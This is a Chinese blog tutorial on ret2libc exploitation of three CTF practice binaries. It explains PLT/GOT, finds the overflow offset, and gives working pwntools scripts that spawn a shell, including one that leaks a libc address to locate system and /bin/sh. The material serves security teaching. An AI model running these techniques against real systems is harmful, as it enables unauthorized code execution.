pwn基本ROP——ret2libc

最新推荐文章于 2022-07-03 22:54:56 发布
最新推荐文章于 2022-07-03 22:54:56 发布
阅读量2k 收藏 42
点赞数 10
分类专栏: pwn 文章标签: 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/turtlesd/article/details/124421356
版权

ret2libc

环境

retlibc1

ret2libc2

ret2libc3

PLT表和GOT表

在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。

Globle offset table(GOT)全局偏移量表,位于数据段,是一个每个条目是8字节地址的数组,用来存储外部函数在内存的确切地址

Procedure linkage table(PLT)过程连接表,位于代码段,是一个每个条目是16字节内容的数组,使得代码能够方便的访问共享的函数或者变量

关于GOT与PLT的详细内容可以看这个视频学习,这里只进行简要介绍

简单来说,当程序第一次执行函数A时,流程如下:
请添加图片描述
在汇编程序调用函数A时,会先找到函数A对应的PLT表,PLT表中第一行指令则是找到函数A对应的GOT表。此时由于是程序第一次调用A,GOT表还未更新,会先去公共PLT进行一番操作查找函数A的位置,找到A的位置后再更新A的GOT表,并调用函数A。

当程序第二次执行函数A时,流程如下请添加图片描述
可以看到此时A的GOT表已经更新,可以直接在GOT表中找到其在内存中的位置并直接调用。

ret2libc1

原理

利用程序自带的system函数和/bin/sh字符串构造system("/bin/sh")函数,通过主函数gets函数溢出覆盖返回值来返回到system函数地址,从而执行上述函数获得最高权限。

漏洞分析

使用checksec查看保护措施

checksec ret2libc1

在这里插入图片描述
可以看到是32位程序,且仅开启了堆栈不可执行

使用IDA32位进行调试

主函数反汇编结果如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("RET2LIBC >_<");
  gets(s);
  return 0;
}

在这里我们发现了gets危险函数,gets不对输入数据的边界作限制,故可利用这个函数造成溢出覆盖返回值来执行我们想要执行的函数

观测左边函数一栏,我们可以发现存在_system函数,其plt地址为0x08048460
在这里插入图片描述

再利用Shift + F12组合键查看字符串,我们可以看到/bin/sh字符串,其地址为0x08048720
在这里插入图片描述
我们就可以利用上述两个信息来构造一套组合拳,通过main函数的return返回到system函数的plt地址来执行该函数,并传入/bin/sh字符串的地址,具体可见payload

获取偏移量

利用gdb进行随机字符填充,覆盖返回值,然后根据返回值的覆盖情况来获取return偏移量。

gdb ret2libc1
cyclic 200
r

在这里插入图片描述
可以看到Invalid address 0x62616164,我们再利用cyclic查看一下这四个字符在随机字符中的位置
在这里插入图片描述
可以看到是在112位,所以return偏移量为112

payload

from pwn import *
 
io = process('./ret2libc1')

sys_plt = p32(0x08048460)
bin_sh = p32(0x08048720)

payload = bytes('a' * 112,'utf-8') + sys_plt + bytes('bbbb','utf-8') + bin_sh

io.sendline(payload)

io.interactive()
地址栈中数据
ebp ~ ebp - 0x64a
main函数returnsys_plt
system函数returnbbbb
system函数参数“/bin/sh”

ret2libc2

原理

这个版本与上个版本的区别就是/bin/sh字段不再出现在程序中,我们只能自行构造/bin/sh
这里可以通过gets函数将/bin/sh输入到.bss段,然后再像ret2libc1一样的操作执行system函数

漏洞分析

checksec

在这里插入图片描述
可以看到是32位程序,仅开启了NX堆栈不可执行

使用IDA进行调试

主函数反汇编结果如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("Something surprise here, but I don't think it will work.");
  printf("What do you think ?");
  gets(v4);
  return 0;
}

可以看到这里存在与ret2libc1一样的漏洞,可以利用gets来覆盖返回值

我们依旧可以在左边的函数栏找到_system,找到system的plt地址为08048490

再次利用shift + F12查找字符串,并没有发现/bin/sh

但我们发现左边plt段有_gets,所以可以利用gets函数,将全局变量的某个数组作为gets函数的参数,从而输入/bin/sh来自造该字符串

进入.bss段,发现了buf2数组
在这里插入图片描述
利用gdb调试看看这里该地址可以写入
在这里插入图片描述
可以看到,buf2数组在0x804a000~0x804b000段,该段有写入权限

所以我们可以将buf2作为gets函数的参数传入,读入/bin/sh来自造数据,从而执行system函数

payload

from pwn import *
 
io = process('./ret2libc2')

gets_plt = p32(0x08048460)
sys_plt = p32(0x08048490)
buf2_addr = p32(0x0804A080)

payload = bytes('a' * 112,'utf-8') + gets_plt + sys_plt + buf2_addr + buf2_addr

io.sendline(payload)
io.sendline('/bin/sh')

io.interactive()
地址栈中数据
ebp~ebp-0x64a
main函数returngets_plt
gets函数returnsys_plt
gets函数参数&&system函数returnbuf2_addr
system函数参数buf2_addr

ret2libc3

原理

在这道题中,system函数的plt地址也没了,我们必须将system函数和/bin/sh都构造出来才可以获取最高权限。

在程序每次运行时libc函数库的位置都不一样,但libc中的函数的相对位置是不会改变的,所以我们只需要找到一个函数的地址,再找到我们想要的函数的偏移量,就可以找到我们想要执行的函数的地址

但这里的偏移量该怎么查找呢?
这里我们要用到一个工具:libcsearcher
该工具用法如下

from LibcSearcher import *

#第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型
obj = LibcSearcher("fgets", 0X7ff39014bd90)

obj.dump("system")        #system 偏移
obj.dump("str_bin_sh")    #/bin/sh 偏移
obj.dump("__libc_start_main_ret")

漏洞分析

checksec

在这里插入图片描述
可以看到该程序是32位的,且仅开启了NX堆栈不可执行

使用IDA调试

main函数反汇编结果如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No surprise anymore, system disappeard QQ.");
  printf("Can you find it !?");
  gets(s);
  return 0;
}

我们依旧可以通过gets函数来修改返回地址,执行想要执行的函数,具体见payload

payload

from pwn import *
from LibcSearcher import *
 
io = process('./ret2libc3')
elf = ELF('./ret2libc3')

puts_plt = p32(elf.plt['puts'])
puts_got = p32(elf.got['puts'])
start_addr = p32(elf.symbols['_start'])
payload = bytes('a' * 112,'utf-8') + puts_plt + start_addr + puts_got
io.sendlineafter("Can you find it !?",payload)
puts_addr = u32(io.recv(4))
print('aa')

libc = LibcSearcher("puts",puts_addr)
libcbase = puts_addr - libc.dump("puts")
sys_addr = libcbase + libc.dump("system")
bin_sh_addr = libcbase + libc.dump("str_bin_sh")
payload2 = bytes('a' * 112,'utf-8') + p32(sys_addr) + bytes('b' * 4,'utf-8') + p32(bin_sh_addr)

io.sendlineafter("Can you find it !?",payload2)

io.interactive()

关于ELF的教学可以在这里进行学习

payload1:

地址栈中数据
ebp ~ ebp-0x64a
main函数returnputs_plt
puts函数returnstart_addr
puts函数参数puts_got

这样构造即可输出puts_got,且puts函数返回到_start,即整个程序开始的地方,程序重新运行,我们可以再次输入数据来执行想要的命令,如下

payload2:

地址栈中数据
ebp~ebp-0x64a
main函数returnsys_addr
system函数returnbbbb
system函数参数/bin/sh

这里我们利用puts函数的地址找到了libc的位置,利用puts函数的地址和libc中的puts函数的偏移量找到libc的基址,从而以这个基址加上libcsystem/bin/sh的偏移量找到这两个函数(字符串)的地址,再通过gets函数修改返回值来执行system函数获取权限

见过自讼
关注
  • 10
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
rop之ret2libc
温和的跳跃
02-04 246
发现很久没有看那些理论还忘记了。理论还是有用得看看的。 ROP例子还是https://www.zhihu.com/search?type=content&q=x86%20ROP这个 我回顾一下ret2libc (本身就不熟悉 : ret2libc 全称是returnlibc.so 意思是跳转到libc.so这里 .so结尾在linux是代表动态链接库 里面包含很多函数,当程序运行到需要链接的地方就会加载进来。 为什么要使用这种办法呢,当程序开启DEP(data execute preve..
ret2libc
huzai9527的博客
02-03 394
1. buooj - ciscn_2019_c_1(64 位) from pwn import * #p = remote('node3.buuoj.cn',28190) p = process('./ciscn_2019_c_1') context.log_level = 'debug' puts_plt = 0x4006e0 puts_got = 0x602020 gets_got = 0x602050 pop_rdi = 0x0000000000400c83 main = 0x4009a0 #ste
Ret2libc
钞sir的博客
01-26 8676
三生三世十里桃花 她就像是一道疤 像风像雨像飞沙 像空气一样难抓 简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有sys...
PWN篇:ret2libc
weixin_44644249的博客
01-28 421
PWN篇:ret2libc 源码 #include void vuln_func(){ char buf[128]; read(STDIN_FILENO,buf,256); } int main(int argc,char* argv[]){ vuln_func(); write(STDOUT_FILENO,"hello world!\n",13); } 很明显vuln为溢出函数 编译 gcc -m32 -fno-stack-protector -no-pie -z execstack tes
pwn刷题num38---ret2libc
tbsqigongzi的博客
05-02 302
BUUCTF-PWN-铁人三项(第五赛区)_2018_rop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看源码 read函数输入0x100字节,而buf只有0x88字节,存在栈溢出 buf距离返回地址0x88+0x4字节 观察程序没有后门函数,但存在write函数,
pwn学习——ret2libc2
MrTreebook的博客
11-28 995
pwn学习——ret2libc21.攻击原理2. ret2libc2的源代码3.checksec看一下保护4.exp 1.攻击原理 通过把函数返回地址直接指向系统库中的函数(如system函数),同时构造该函数的输入参数栈,就可以达到代码执行的目的。 正常堆栈布局: ret2libc执行system的堆栈布局: 本题和ret2libc1的区别就是程序中没有自带"/bin/sh",需要自己写进去 2. ret2libc2的源代码 #include <stdio.h> #include <
PWN题型之Ret2Libc
swedsn
03-18 3964
文章目录前言0x1 :使用前提条件0x2 :为什么要这么使用0x3 :使用方法0x4 :实例二、使用步骤总结 前言 菜鸡总结,如有不对,请指点 0x1 :使用前提条件 查看保护:开启了NX保护,但是没有开启PLE保护,可以开启canary保护。但是这样就是两种题型结合了。 打开IDA查看源代码:存在溢出条件,但是没有system函数(/bin/sh)和 flag字样。 ` 0x2 :为什么要这么使用 由于缺少system函数,所以需要构造shellcode。但是开启了NX保护(可执行的不可修改,可修改不可执
pwn刷题num6--ret2libc
tbsqigongzi的博客
04-21 367
攻防世界pwn新手区level3 下载附件后发现是tar.gz文件, 使用该命令解压 tar -xvf 文件名 解压后保存到的目录 解压后发现给了libclibc是c语言函数库,里面包含各种函数如write,read,system,也有字符串/bin/sh等 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位,小端序 开启部分RELRO---got表仍可写 未开启canary保护---存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE---
Ret2libc 1
weixin_44864859的博客
05-19 668
Ret2libc 1 题目代码和之前一样,gets函数存在栈溢出。同时也存在system函数,但是不同之处是我们不能直接跳转到system(“shell!?”)。因为我们要执行的是system(“bin/sh”)。 首先,我们可以在内存中搜索一下看有没有这个字符串 我们可以看到在0x8049720存在我们需要的字符串 那么,我们直接返回该处,即执行 system 函数。相应的 payload 如下 from pwn import * sh = process('./ret2libc1') binsh_
pwn ret2libc
清霂的博客
02-04 394
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libclibc.so是一个函数库(类似于C语言#include<iostream>的iostrea
ROP-基础-ret2libc1
热门推荐
ATFWUS的博客
02-28 1万+
文件下载地址: 链接:https://pan.baidu.com/s/1DN4q7Dl5J45rIysA0DvZ5A 提取码:0wn8 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
PWN —— ret2libc2
qq_41696518的博客
07-03 258
ret2libc2
pwn ret2libc原理
最新发布
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值